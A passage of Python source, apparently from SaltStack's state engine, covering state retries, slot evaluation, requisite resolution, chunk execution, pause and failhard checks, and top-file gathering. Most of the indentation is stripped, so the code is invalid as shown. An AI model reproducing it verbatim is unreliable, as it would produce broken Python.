utc_finish_time = datetime.datetime.utcnow()
timezone_delta = datetime.datetime.utcnow() - datetime.datetime.now()
local_finish_time = utc_finish_time - timezone_delta
local_start_time = utc_start_time - timezone_delta
ret["start_time"] = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
        # duration in milliseconds, with microsecond precision
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
ret["__id__"] = low["__id__"]
log.info(
"Completed state [%s] at time %s (duration_in_ms=%s)",
low["name"].strip()
if isinstance(low["name"], six.string_types)
else low["name"],
local_finish_time.time().isoformat(),
duration,
)
if "retry" in low:
low["retry"] = self.verify_retry_data(low["retry"])
if not sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]:
if low["retry"]["until"] != ret["result"]:
if low["retry"]["attempts"] > retries:
interval = low["retry"]["interval"]
if low["retry"]["splay"] != 0:
interval = interval + random.randint(
0, low["retry"]["splay"]
)
log.info(
"State result does not match retry until value, "
"state will be re-run in %s seconds",
interval,
)
self.functions["test.sleep"](interval)
retry_ret = self.call(low, chunks, running, retries=retries + 1)
orig_ret = ret
ret = retry_ret
ret["comment"] = "\n".join(
[
(
'Attempt {0}: Returned a result of "{1}", '
'with the following comment: "{2}"'.format(
retries, orig_ret["result"], orig_ret["comment"]
)
),
"" if not ret["comment"] else ret["comment"],
]
)
ret["duration"] = (
ret["duration"] + orig_ret["duration"] + (interval * 1000)
)
if retries == 1:
ret["start_time"] = orig_ret["start_time"]
else:
ret["comment"] = " ".join(
[
"" if not ret["comment"] else ret["comment"],
(
"The state would be retried every {1} seconds "
"(with a splay of up to {3} seconds) "
"a maximum of {0} times or until a result of {2} "
"is returned"
).format(
low["retry"]["attempts"],
low["retry"]["interval"],
low["retry"]["until"],
low["retry"]["splay"],
),
]
)
return ret
def __eval_slot(self, slot):
log.debug("Evaluating slot: %s", slot)
fmt = slot.split(":", 2)
if len(fmt) != 3:
log.warning("Malformed slot: %s", slot)
return slot
if fmt[1] != "salt":
log.warning("Malformed slot: %s", slot)
log.warning(
"Only execution modules are currently supported in slots. This means slot "
'should start with "__slot__:salt:"'
)
return slot
fun, args, kwargs = salt.utils.args.parse_function(fmt[2])
if not fun or fun not in self.functions:
log.warning("Malformed slot: %s", slot)
log.warning(
"Execution module should be specified in a function call format: "
"test.arg('arg', kw='kwarg')"
)
return slot
log.debug("Calling slot: %s(%s, %s)", fun, args, kwargs)
slot_return = self.functions[fun](*args, **kwargs)
# Given input __slot__:salt:test.arg(somekey="value").not.exist ~ /appended
# slot_text should be __slot...).not.exist
# append_data should be ~ /appended
slot_text = fmt[2].split("~")[0]
append_data = fmt[2].split("~", 1)[1:]
log.debug("slot_text: %s", slot_text)
log.debug("append_data: %s", append_data)
# Support parsing slot dict response
# return_get should result in a kwargs.nested.dict path by getting
# everything after first closing paren: )
return_get = None
try:
return_get = slot_text[slot_text.rindex(")") + 1 :]
except ValueError:
pass
if return_get:
# remove first period
return_get = return_get.split(".", 1)[1].strip()
log.debug("Searching slot result %s for %s", slot_return, return_get)
slot_return = salt.utils.data.traverse_dict_and_list(
slot_return, return_get, default=None, delimiter="."
)
if append_data:
if isinstance(slot_return, six.string_types):
# Append text to slot string result
append_data = " ".join(append_data).strip()
log.debug("appending to slot result: %s", append_data)
slot_return += append_data
else:
log.error("Ignoring slot append, slot result is not a string")
return slot_return
def format_slots(self, cdata):
"""
        Read in the arguments from the low level slot syntax to make a last
        minute runtime call to gather relevant data for the specific routine.
        Parses strings, first level dictionary values, and strings and first
        level dict values inside of lists.
"""
        # __slot__:salt:cmd.run(foo, bar, baz=qux)
SLOT_TEXT = "__slot__:"
ctx = (("args", enumerate(cdata["args"])), ("kwargs", cdata["kwargs"].items()))
for atype, avalues in ctx:
for ind, arg in avalues:
arg = salt.utils.data.decode(arg, keep=True)
if isinstance(arg, dict):
# Search dictionary values for __slot__:
for key, value in arg.items():
try:
if value.startswith(SLOT_TEXT):
log.trace("Slot processsing dict value %s", value)
cdata[atype][ind][key] = self.__eval_slot(value)
except AttributeError:
# Not a string/slot
continue
elif isinstance(arg, list):
for idx, listvalue in enumerate(arg):
log.trace("Slot processing list value: %s", listvalue)
if isinstance(listvalue, dict):
# Search dict values in list for __slot__:
for key, value in listvalue.items():
try:
if value.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested dict value %s",
value,
)
cdata[atype][ind][idx][key] = self.__eval_slot(
value
)
except AttributeError:
# Not a string/slot
continue
if isinstance(listvalue, six.text_type):
# Search strings in a list for __slot__:
if listvalue.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested string %s", listvalue
)
cdata[atype][ind][idx] = self.__eval_slot(listvalue)
elif isinstance(arg, six.text_type) and arg.startswith(SLOT_TEXT):
# Search strings for __slot__:
log.trace("Slot processsing %s", arg)
cdata[atype][ind] = self.__eval_slot(arg)
else:
# Not a slot, skip it
continue
def verify_retry_data(self, retry_data):
"""
        Verify the specified retry data.
"""
retry_defaults = {
"until": True,
"attempts": 2,
"splay": 0,
"interval": 30,
}
expected_data = {
"until": bool,
"attempts": int,
"interval": int,
"splay": int,
}
validated_retry_data = {}
if isinstance(retry_data, dict):
for expected_key, value_type in six.iteritems(expected_data):
if expected_key in retry_data:
if isinstance(retry_data[expected_key], value_type):
validated_retry_data[expected_key] = retry_data[expected_key]
else:
log.warning(
"An invalid value was passed for the retry %s, "
"using default value '%s'",
expected_key,
retry_defaults[expected_key],
)
validated_retry_data[expected_key] = retry_defaults[
expected_key
]
else:
validated_retry_data[expected_key] = retry_defaults[expected_key]
else:
log.warning(
(
"State is set to retry, but a valid dict for retry "
"configuration was not found. Using retry defaults"
)
)
validated_retry_data = retry_defaults
return validated_retry_data
def call_chunks(self, chunks):
"""
Iterate over a list of chunks and call them, checking for requires.
"""
# Check for any disabled states
disabled = {}
if "state_runs_disabled" in self.opts["grains"]:
for low in chunks[:]:
state_ = "{0}.{1}".format(low["state"], low["fun"])
for pat in self.opts["grains"]["state_runs_disabled"]:
if fnmatch.fnmatch(state_, pat):
comment = (
'The state function "{0}" is currently disabled by "{1}", '
"to re-enable, run state.enable {1}."
).format(state_, pat,)
_tag = _gen_tag(low)
disabled[_tag] = {
"changes": {},
"result": False,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
chunks.remove(low)
break
running = {}
for low in chunks:
if "__FAILHARD__" in running:
running.pop("__FAILHARD__")
return running
tag = _gen_tag(low)
if tag not in running:
# Check if this low chunk is paused
action = self.check_pause(low)
if action == "kill":
break
running = self.call_chunk(low, running, chunks)
if self.check_failhard(low, running):
return running
self.active = set()
while True:
if self.reconcile_procs(running):
break
time.sleep(0.01)
ret = dict(list(disabled.items()) + list(running.items()))
return ret
def check_failhard(self, low, running):
"""
Check if the low data chunk should send a failhard signal
"""
tag = _gen_tag(low)
if self.opts.get("test", False):
return False
if low.get("failhard", self.opts["failhard"]) and tag in running:
if running[tag]["result"] is None:
return False
return not running[tag]["result"]
return False
def check_pause(self, low):
"""
Check to see if this low chunk has been paused
"""
if not self.jid:
# Can't pause on salt-ssh since we can't track continuous state
return
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
start = time.time()
if os.path.isfile(pause_path):
try:
                tries = 0
                while True:
with salt.utils.files.fopen(pause_path, "rb") as fp_:
try:
pdat = msgpack_deserialize(fp_.read())
except salt.utils.msgpack.exceptions.UnpackValueError:
# Reading race condition
if tries > 10:
# Break out if there are a ton of read errors
return
tries += 1
time.sleep(1)
continue
id_ = low["__id__"]
key = ""
if id_ in pdat:
key = id_
elif "__all__" in pdat:
key = "__all__"
if key:
if "duration" in pdat[key]:
now = time.time()
if now - start > pdat[key]["duration"]:
return "run"
if "kill" in pdat[key]:
return "kill"
else:
return "run"
time.sleep(1)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Failed to read in pause data for file located at: %s", pause_path
)
return "run"
return "run"
def reconcile_procs(self, running):
"""
Check the running dict for processes and resolve them
"""
retset = set()
for tag in running:
proc = running[tag].get("proc")
if proc:
if not proc.is_alive():
ret_cache = os.path.join(
self.opts["cachedir"],
self.jid,
salt.utils.hashutils.sha1_digest(tag),
)
if not os.path.isfile(ret_cache):
ret = {
"result": False,
"comment": "Parallel process failed to return",
"name": running[tag]["name"],
"changes": {},
}
try:
with salt.utils.files.fopen(ret_cache, "rb") as fp_:
ret = msgpack_deserialize(fp_.read())
except (OSError, IOError):
ret = {
"result": False,
"comment": "Parallel cache failure",
"name": running[tag]["name"],
"changes": {},
}
running[tag].update(ret)
running[tag].pop("proc")
else:
retset.add(False)
return False not in retset
def check_requisite(self, low, running, chunks, pre=False):
"""
Look into the running data to check the status of all requisite
states
"""
present = False
# If mod_watch is not available make it a require
if "watch" in low:
if "{0}.mod_watch".format(low["state"]) not in self.states:
if "require" in low:
low["require"].extend(low.pop("watch"))
else:
low["require"] = low.pop("watch")
else:
present = True
if "watch_any" in low:
if "{0}.mod_watch".format(low["state"]) not in self.states:
if "require_any" in low:
low["require_any"].extend(low.pop("watch_any"))
else:
low["require_any"] = low.pop("watch_any")
else:
present = True
if "require" in low:
present = True
if "require_any" in low:
present = True
if "prerequired" in low:
present = True
if "prereq" in low:
present = True
if "onfail" in low:
present = True
if "onfail_any" in low:
present = True
if "onchanges" in low:
present = True
if "onchanges_any" in low:
present = True
if not present:
return "met", ()
self.reconcile_procs(running)
reqs = {
"require": [],
"require_any": [],
"watch": [],
"watch_any": [],
"prereq": [],
"onfail": [],
"onfail_any": [],
"onchanges": [],
"onchanges_any": [],
}
if pre:
reqs["prerequired"] = []
for r_state in reqs:
if r_state in low and low[r_state] is not None:
for req in low[r_state]:
if isinstance(req, six.string_types):
req = {"id": req}
req = trim_req(req)
found = False
for chunk in chunks:
req_key = next(iter(req))
req_val = req[req_key]
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
found = True
reqs[r_state].append(chunk)
continue
try:
if isinstance(req_val, six.string_types):
if fnmatch.fnmatch(
chunk["name"], req_val
) or fnmatch.fnmatch(chunk["__id__"], req_val):
if req_key == "id" or chunk["state"] == req_key:
found = True
reqs[r_state].append(chunk)
else:
raise KeyError
except KeyError as exc:
raise SaltRenderError(
"Could not locate requisite of [{0}] present in state with name [{1}]".format(
req_key, chunk["name"]
)
)
except TypeError:
# On Python 2, the above req_val, being an OrderedDict, will raise a KeyError,
# however on Python 3 it will raise a TypeError
# This was found when running tests.unit.test_state.StateCompilerTestCase.test_render_error_on_invalid_requisite
raise SaltRenderError(
"Could not locate requisite of [{0}] present in state with name [{1}]".format(
req_key, chunk["name"]
)
)
if not found:
return "unmet", ()
fun_stats = set()
for r_state, chunks in six.iteritems(reqs):
req_stats = set()
if r_state.startswith("prereq") and not r_state.startswith("prerequired"):
run_dict = self.pre
else:
run_dict = running
while True:
if self.reconcile_procs(run_dict):
break
time.sleep(0.01)
for chunk in chunks:
tag = _gen_tag(chunk)
if tag not in run_dict:
req_stats.add("unmet")
continue
if r_state.startswith("onfail"):
if run_dict[tag]["result"] is True:
req_stats.add("onfail") # At least one state is OK
continue
else:
if run_dict[tag]["result"] is False:
req_stats.add("fail")
continue
if r_state.startswith("onchanges"):
if not run_dict[tag]["changes"]:
req_stats.add("onchanges")
else:
req_stats.add("onchangesmet")
continue
if r_state.startswith("watch") and run_dict[tag]["changes"]:
req_stats.add("change")
continue
if r_state.startswith("prereq") and run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("premet")
if r_state.startswith("prereq") and not run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("pre")
else:
if run_dict[tag].get("__state_ran__", True):
req_stats.add("met")
if r_state.endswith("_any"):
if "met" in req_stats or "change" in req_stats:
if "fail" in req_stats:
req_stats.remove("fail")
if "onchangesmet" in req_stats:
if "onchanges" in req_stats:
req_stats.remove("onchanges")
if "fail" in req_stats:
req_stats.remove("fail")
if "onfail" in req_stats:
if "fail" in req_stats:
req_stats.remove("onfail")
fun_stats.update(req_stats)
if "unmet" in fun_stats:
status = "unmet"
elif "fail" in fun_stats:
status = "fail"
elif "pre" in fun_stats:
if "premet" in fun_stats:
status = "met"
else:
status = "pre"
elif "onfail" in fun_stats and "met" not in fun_stats:
status = "onfail" # all onfail states are OK
elif "onchanges" in fun_stats and "onchangesmet" not in fun_stats:
status = "onchanges"
elif "change" in fun_stats:
status = "change"
else:
status = "met"
return status, reqs
def event(self, chunk_ret, length, fire_event=False):
"""
Fire an event on the master bus
If `fire_event` is set to True an event will be sent with the
chunk name in the tag and the chunk result in the event data.
If `fire_event` is set to a string such as `mystate/is/finished`,
an event will be sent with the string added to the tag and the chunk
result in the event data.
        If `state_events` is set to True in the config, then after the
        chunk is evaluated an event will be sent up to the master with the
        results.
"""
if not self.opts.get("local") and (
self.opts.get("state_events", True) or fire_event
):
if not self.opts.get("master_uri"):
ev_func = lambda ret, tag, preload=None: salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
).fire_event(
ret, tag
)
else:
ev_func = self.functions["event.fire_master"]
ret = {"ret": chunk_ret}
if fire_event is True:
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], six.text_type(chunk_ret["name"])],
"state_result",
)
elif isinstance(fire_event, six.string_types):
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], six.text_type(fire_event)],
"state_result",
)
else:
tag = salt.utils.event.tagify(
[
self.jid,
"prog",
self.opts["id"],
six.text_type(chunk_ret["__run_num__"]),
],
"job",
)
ret["len"] = length
preload = {"jid": self.jid}
ev_func(ret, tag, preload=preload)
def call_chunk(self, low, running, chunks):
"""
Check if a chunk has any requires, execute the requires and then
the chunk
"""
low = self._mod_aggregate(low, running, chunks)
self._mod_init(low)
tag = _gen_tag(low)
if not low.get("prerequired"):
self.active.add(tag)
requisites = [
"require",
"require_any",
"watch",
"watch_any",
"prereq",
"onfail",
"onfail_any",
"onchanges",
"onchanges_any",
]
if not low.get("__prereq__"):
requisites.append("prerequired")
status, reqs = self.check_requisite(low, running, chunks, pre=True)
else:
status, reqs = self.check_requisite(low, running, chunks)
if status == "unmet":
lost = {}
reqs = []
for requisite in requisites:
lost[requisite] = []
if requisite not in low:
continue
for req in low[requisite]:
if isinstance(req, six.string_types):
req = {"id": req}
req = trim_req(req)
found = False
req_key = next(iter(req))
req_val = req[req_key]
for chunk in chunks:
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
if requisite == "prereq":
chunk["__prereq__"] = True
reqs.append(chunk)
found = True
continue
if fnmatch.fnmatch(chunk["name"], req_val) or fnmatch.fnmatch(
chunk["__id__"], req_val
):
if req_key == "id" or chunk["state"] == req_key:
if requisite == "prereq":
chunk["__prereq__"] = True
elif requisite == "prerequired":
chunk["__prerequired__"] = True
reqs.append(chunk)
found = True
if not found:
lost[requisite].append(req)
if (
lost["require"]
or lost["watch"]
or lost["prereq"]
or lost["onfail"]
or lost["onchanges"]
or lost.get("prerequired")
):
comment = "The following requisites were not found:\n"
for requisite, lreqs in six.iteritems(lost):
if not lreqs:
continue
comment += "{0}{1}:\n".format(" " * 19, requisite)
for lreq in lreqs:
req_key = next(iter(lreq))
req_val = lreq[req_key]
comment += "{0}{1}: {2}\n".format(" " * 23, req_key, req_val)
if low.get("__prereq__"):
run_dict = self.pre
else:
run_dict = running
start_time, duration = _calculate_fake_duration()
run_dict[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(run_dict[tag], len(chunks), fire_event=low.get("fire_event"))
return running
for chunk in reqs:
# Check to see if the chunk has been run, only run it if
# it has not been run already
ctag = _gen_tag(chunk)
if ctag not in running:
if ctag in self.active:
if chunk.get("__prerequired__"):
                        # Prereq recursive, run this chunk with prereq on
if tag not in self.pre:
low["__prereq__"] = True
self.pre[ctag] = self.call(low, chunks, running)
return running
else:
return running
elif ctag not in running:
log.error("Recursive requisite found")
running[tag] = {
"changes": {},
"result": False,
"comment": "Recursive requisite found",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(
running[tag], len(chunks), fire_event=low.get("fire_event")
)
return running
running = self.call_chunk(chunk, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
if low.get("__prereq__"):
status, reqs = self.check_requisite(low, running, chunks)
self.pre[tag] = self.call(low, chunks, running)
if not self.pre[tag]["changes"] and status == "change":
self.pre[tag]["changes"] = {"watch": "watch"}
self.pre[tag]["result"] = None
else:
running = self.call_chunk(low, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
elif status == "met":
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
elif status == "fail":
# if the requisite that failed was due to a prereq on this low state
# show the normal error
if tag in self.pre:
running[tag] = self.pre[tag]
running[tag]["__run_num__"] = self.__run_num
running[tag]["__sls__"] = low["__sls__"]
# otherwise the failure was due to a requisite down the chain
else:
                # determine what the requisite failures were, and return
# a nice error message
failed_requisites = set()
# look at all requisite types for a failure
for req_lows in six.itervalues(reqs):
for req_low in req_lows:
req_tag = _gen_tag(req_low)
req_ret = self.pre.get(req_tag, running.get(req_tag))
# if there is no run output for the requisite it
# can't be the failure
if req_ret is None:
continue
# If the result was False (not None) it was a failure
if req_ret["result"] is False:
                            # use SLS.ID for the key -- so it's easier to find
key = "{sls}.{_id}".format(
sls=req_low["__sls__"], _id=req_low["__id__"]
)
failed_requisites.add(key)
_cmt = "One or more requisite failed: {0}".format(
", ".join(six.text_type(i) for i in failed_requisites)
)
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": _cmt,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.pre[tag] = running[tag]
self.__run_num += 1
elif status == "change" and not low.get("__prereq__"):
ret = self.call(low, chunks, running)
if not ret["changes"] and not ret.get("skip_watch", False):
low = low.copy()
low["sfun"] = low["fun"]
low["fun"] = "mod_watch"
low["__reqs__"] = reqs
ret = self.call(low, chunks, running)
running[tag] = ret
elif status == "pre":
start_time, duration = _calculate_fake_duration()
pre_ret = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "No changes detected",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
running[tag] = pre_ret
self.pre[tag] = pre_ret
self.__run_num += 1
elif status == "onfail":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because onfail req did not change",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
elif status == "onchanges":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because none of the onchanges reqs changed",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
else:
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
if tag in running:
self.event(running[tag], len(chunks), fire_event=low.get("fire_event"))
return running
def call_listen(self, chunks, running):
"""
Find all of the listen routines and call the associated mod_watch runs
"""
listeners = []
crefs = {}
for chunk in chunks:
crefs[(chunk["state"], chunk["__id__"], chunk["name"])] = chunk
if "listen" in chunk:
listeners.append(
{(chunk["state"], chunk["__id__"], chunk["name"]): chunk["listen"]}
)
if "listen_in" in chunk:
for l_in in chunk["listen_in"]:
for key, val in six.iteritems(l_in):
listeners.append(
{(key, val, "lookup"): [{chunk["state"]: chunk["__id__"]}]}
)
mod_watchers = []
errors = {}
for l_dict in listeners:
for key, val in six.iteritems(l_dict):
for listen_to in val:
if not isinstance(listen_to, dict):
found = False
for chunk in chunks:
if (
chunk["__id__"] == listen_to
or chunk["name"] == listen_to
):
listen_to = {chunk["state"]: chunk["__id__"]}
found = True
if not found:
continue
for lkey, lval in six.iteritems(listen_to):
if not any(lkey == cref[0] and lval in cref for cref in crefs):
rerror = {
_l_tag(lkey, lval): {
"comment": "Referenced state {0}: {1} does not exist".format(
lkey, lval
),
"name": "listen_{0}:{1}".format(lkey, lval),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
to_tags = [
_gen_tag(data)
for cref, data in six.iteritems(crefs)
if lkey == cref[0] and lval in cref
]
for to_tag in to_tags:
if to_tag not in running:
continue
if running[to_tag]["changes"]:
if not any(
key[0] == cref[0] and key[1] in cref
for cref in crefs
):
rerror = {
_l_tag(key[0], key[1]): {
"comment": "Referenced state {0}: {1} does not exist".format(
key[0], key[1]
),
"name": "listen_{0}:{1}".format(
key[0], key[1]
),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
new_chunks = [
data
for cref, data in six.iteritems(crefs)
if key[0] == cref[0] and key[1] in cref
]
for chunk in new_chunks:
low = chunk.copy()
low["sfun"] = chunk["fun"]
low["fun"] = "mod_watch"
low["__id__"] = "listener_{0}".format(low["__id__"])
for req in STATE_REQUISITE_KEYWORDS:
if req in low:
low.pop(req)
mod_watchers.append(low)
ret = self.call_chunks(mod_watchers)
running.update(ret)
for err in errors:
errors[err]["__run_num__"] = self.__run_num
self.__run_num += 1
running.update(errors)
return running
def call_high(self, high, orchestration_jid=None):
"""
Process a high data call and ensure the defined states.
"""
errors = []
# If there is extension data reconcile it
high, ext_errors = self.reconcile_extend(high)
errors.extend(ext_errors)
errors.extend(self.verify_high(high))
if errors:
return errors
high, req_in_errors = self.requisite_in(high)
errors.extend(req_in_errors)
high = self.apply_exclude(high)
# Verify that the high data is structurally sound
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.compile_high_data(high, orchestration_jid)
# If there are extensions in the highstate, process them and update
# the low data chunks
if errors:
return errors
ret = self.call_chunks(chunks)
ret = self.call_listen(chunks, ret)
def _cleanup_accumulator_data():
accum_data_path = os.path.join(
get_accumulator_dir(self.opts["cachedir"]), self.instance_id
)
try:
os.remove(accum_data_path)
log.debug("Deleted accumulator data file %s", accum_data_path)
except OSError:
log.debug("File %s does not exist, no need to cleanup", accum_data_path)
_cleanup_accumulator_data()
if self.jid is not None:
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
if os.path.isfile(pause_path):
try:
os.remove(pause_path)
except OSError:
# File is not present, all is well
pass
return ret
def render_template(self, high, template):
errors = []
if not high:
return high, errors
if not isinstance(high, dict):
errors.append(
"Template {0} does not render to a dictionary".format(template)
)
return high, errors
invalid_items = ("include", "exclude", "extends")
for item in invalid_items:
if item in high:
errors.append(
"The '{0}' declaration found on '{1}' is invalid when "
"rendering single templates".format(item, template)
)
return high, errors
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], six.string_types):
# If this is a short state, it needs to be padded
if "." in high[name]:
comps = high[name].split(".")
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
errors.append(
"ID {0} in template {1} is not a dictionary".format(
name, template
)
)
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if high[name][key] is None:
errors.append(
"ID '{0}' in template {1} contains a short "
"declaration ({2}) with a trailing colon. When not "
"passing any arguments to a state, the colon must be "
"omitted.".format(name, template, key)
)
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{0}' in template '{1}' contains multiple "
"state declarations of the same type".format(name, template)
)
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high, errors
def call_template(self, template):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, template)
if errors:
return errors
return self.call_high(high)
def call_template_str(self, template):
"""
Enforce the states in a template, pass the template as a string
"""
high = compile_template_str(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, "<template-str>")
if errors:
return errors
return self.call_high(high)
class BaseHighState(object):
"""
The BaseHighState is an abstract base class that is the foundation of
running a highstate, extend it and add a self.state object of type State.
When extending this class, please note that ``self.client`` and
``self.matcher`` should be instantiated and handled.
"""
def __init__(self, opts):
self.opts = self.__gen_opts(opts)
self.iorder = 10000
self.avail = self.__gather_avail()
self.serial = salt.payload.Serial(self.opts)
self.building_highstate = OrderedDict()
def __gather_avail(self):
"""
Gather the lists of available sls data from the master
"""
avail = {}
for saltenv in self._get_envs():
avail[saltenv] = self.client.list_states(saltenv)
return avail
def __gen_opts(self, opts):
"""
The options used by the High State object are derived from options
on the minion and the master, or just the minion if the high state
call is entirely local.
"""
# If the state is intended to be applied locally, then the local opts
# should have all of the needed data, otherwise overwrite the local
# data items with data from the master
if "local_state" in opts:
if opts["local_state"]:
return opts
mopts = self.client.master_opts()
if not isinstance(mopts, dict):
# An error happened on the master
opts["renderer"] = "jinja|yaml"
opts["failhard"] = False
opts["state_top"] = salt.utils.url.create("top.sls")
opts["nodegroups"] = {}
opts["file_roots"] = {"base": [syspaths.BASE_FILE_ROOTS_DIR]}
else:
opts["renderer"] = mopts["renderer"]
opts["failhard"] = mopts.get("failhard", False)
if mopts["state_top"].startswith("salt://"):
opts["state_top"] = mopts["state_top"]
elif mopts["state_top"].startswith("/"):
opts["state_top"] = salt.utils.url.create(mopts["state_top"][1:])
else:
opts["state_top"] = salt.utils.url.create(mopts["state_top"])
opts["state_top_saltenv"] = mopts.get("state_top_saltenv", None)
opts["nodegroups"] = mopts.get("nodegroups", {})
opts["state_auto_order"] = mopts.get(
"state_auto_order", opts["state_auto_order"]
)
opts["file_roots"] = mopts["file_roots"]
opts["top_file_merging_strategy"] = mopts.get(
"top_file_merging_strategy", opts.get("top_file_merging_strategy")
)
opts["env_order"] = mopts.get("env_order", opts.get("env_order", []))
opts["default_top"] = mopts.get("default_top", opts.get("default_top"))
opts["state_events"] = mopts.get("state_events")
opts["state_aggregate"] = mopts.get(
"state_aggregate", opts.get("state_aggregate", False)
)
opts["jinja_env"] = mopts.get("jinja_env", {})
opts["jinja_sls_env"] = mopts.get("jinja_sls_env", {})
opts["jinja_lstrip_blocks"] = mopts.get("jinja_lstrip_blocks", False)
opts["jinja_trim_blocks"] = mopts.get("jinja_trim_blocks", False)
return opts
def _get_envs(self):
"""
Pull the file server environments out of the master options
"""
envs = ["base"]
if "file_roots" in self.opts:
envs.extend([x for x in list(self.opts["file_roots"]) if x not in envs])
env_order = self.opts.get("env_order", [])
# Remove duplicates while preserving the order
members = set()
env_order = [
env for env in env_order if not (env in members or members.add(env))
]
client_envs = self.client.envs()
if env_order and client_envs:
return [env for env in env_order if env in client_envs]
elif env_order:
return env_order
else:
envs.extend([env for env in client_envs if env not in envs])
return envs
def get_tops(self):
"""
Gather the top files
"""
tops = DefaultOrderedDict(list)
include = DefaultOrderedDict(list)
done = DefaultOrderedDict(list)
found = 0 # did we find any contents in the top files?
# Gather initial top files
merging_strategy = self.opts["top_file_merging_strategy"]
if merging_strategy == "same" and not self.opts["saltenv"]:
if not self.opts["default_top"]:
raise SaltRenderError(
"top_file_merging_strategy set to 'same', but no "
"default_top configuration option was set"
)
if self.opts["saltenv"]:
contents = self.client.cache_file(
self.opts["state_top"], self.opts["saltenv"]
)
if contents:
found = 1
tops[self.opts["saltenv"]] = [
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=self.opts["saltenv"],
)
]
else:
tops[self.opts["saltenv"]] = [{}]
else:
found = 0
state_top_saltenv = self.opts.get("state_top_saltenv", False)
if state_top_saltenv and not isinstance(
state_top_saltenv, six.string_types
):
state_top_saltenv = six.text_type(state_top_saltenv)
for saltenv in (
[state_top_saltenv] if state_top_saltenv else self._get_envs()
):
contents = self.client.cache_file(self.opts["state_top"], saltenv)
if contents:
found = found + 1
tops[saltenv].append(
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=saltenv,
)
)
else:
tops[saltenv].append({})
log.debug("No contents loaded for saltenv '%s'", saltenv)
if (
found > 1
and merging_strategy == "merge"
and not self.opts.get("env_order", None)
):
log.warning(
"top_file_merging_strategy is set to '%s' and "
"multiple top files were found. Merging order is not "
"deterministic, it may be desirable to either set "
"top_file_merging_strategy to 'same' or use the "
"'env_order' configuration parameter to specify the "
"merging order.",
merging_strategy,
)
if found == 0:
log.debug(
"No contents found in top file. If this is not expected, "
"verify that the 'file_roots' specified in 'etc/master' "
"are accessible. The 'file_roots' configuration is: %s",
repr(self.state.opts["file_roots"]),
)
# Search initial top files for includes
for saltenv, ctops in six.iteritems(tops):
for ctop in ctops:
if "include" not in ctop:
continue
for sls in ctop["include"]:
include[saltenv].append(sls)
ctop.pop("include")
# Go through the includes and pull out the extra tops and add them
while include:
pops = []
for saltenv, states in six.iteritems(include):
pops.append(saltenv)
if not states:
continue
for sls_match in states:
for sls in fnmatch.filter(self.avail[saltenv], sls_match):
if sls in done[saltenv]:
continue
tops[saltenv].append(
compile_template(
self.client.get_state(sls, saltenv).get("dest", False),
self.state.rend,
self.state.opts["renderer"],
